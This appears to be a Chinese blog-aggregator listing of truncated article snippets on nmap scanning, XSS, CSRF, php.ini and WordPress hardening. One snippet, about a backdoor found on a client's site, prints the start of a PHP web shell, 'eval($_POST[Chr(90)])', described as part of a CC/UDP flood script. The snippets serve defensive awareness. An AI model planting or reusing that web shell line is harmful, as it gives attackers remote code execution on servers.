python-nmap使用及案例 nmap概念及功能 概念 NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 finge ...
分类:
编程语言 时间:
2020-07-19 23:56:40
阅读次数:
104
今天把客户查找后门的时候发现的代码,特分享下,看到这样的代码就是黑客用来攻击别人访问,不断访问指定网站,导致网站无法访问,我们的网站就是帮凶了,同时我们自己的网站或服务器也会无法访问,所以一定要注意防范。 cc攻击代码,支持udp <?php eval($_POST[Chr(90)]); set_t ...
分类:
Web程序 时间:
2020-07-14 16:30:35
阅读次数:
75
常见的浏览器攻击分为两种,一种为XSS(跨站脚本攻击),另一种则为CSRF(跨站请求伪造)。 XSS(跨站脚本攻击) 定义 XSS 全称是 Cross Site Scripting,为了与“CSS”区分开来,故简称 XSS,翻译过来就是“跨站脚本”。XSS 攻击是指黑客往 HTML 文件中或者 DO ...
分类:
其他好文 时间:
2020-07-12 16:45:33
阅读次数:
123
jeecg miniDao 框架原理 - 简书 https://www.jianshu.com/p/1bbf9385f803 MiniDao 学习系列 1- - - - 集成使用 - 黑客派 https://hacpai.com/article/1537089268066 @Repository注解 ...
分类:
编程语言 时间:
2020-07-10 18:43:08
阅读次数:
66
前提环境:网站存在CSRF漏洞(也就是过于相信访问请求,只判断了用户是否存在cookie,并未判断请求的发起者) CSRF攻击原理,用户A需要转账,用户A正常向银行网站发送请求登录,登录成功后银行网站服务端把用户的cookie返回给浏览器,浏览器把cookie保存到本地,方便用户下次登录,这时候用户 ...
分类:
其他好文 时间:
2020-07-10 15:11:58
阅读次数:
56
作为黑客技术爱好者的我,一直以来都被php.ini名目众多的选项给弄的头晕目眩,最近查阅了一些资料,略有收获,下面我就结合自己的经验来谈一下php.ini的安全设置。 一、魔术引号 魔术引号指令一共有三个,但我认为与网站安全息息相关的也就是magic_quotesgpc这一项,当“magic_quo ...
分类:
Web程序 时间:
2020-07-07 19:38:44
阅读次数:
58
最近wordpress安全问题被小编我所关注着,我们如何做才能最大程度上保护我们的wordpress程序不被黑客所攻击?可能很多技术大牛都习以为常了,但是毕竟还是有很多菜鸟不知道的,本帖为一篇wordpress安全防护的扫盲贴吧,帮助大家尽可能的提升wordpress程序的安全性!亲身经验,这里面小 ...
分类:
其他好文 时间:
2020-07-06 13:02:29
阅读次数:
73
回想一下2016年到现在兴起的一些模式,比如直播、P2P、共享经济、在线抓娃娃等,再到时间更近一些的吃鸡大战、在线答题、短视频等,有没有发现什么规律… 通过自己的思考,结合网上的一些文章,得出来的感受主要有以下两点: 时间窗口期在变得越来越短,从早期以年、半年为单位的窗口期,变成了现在以月计,甚至是 ...
分类:
其他好文 时间:
2020-07-06 10:52:52
阅读次数:
83
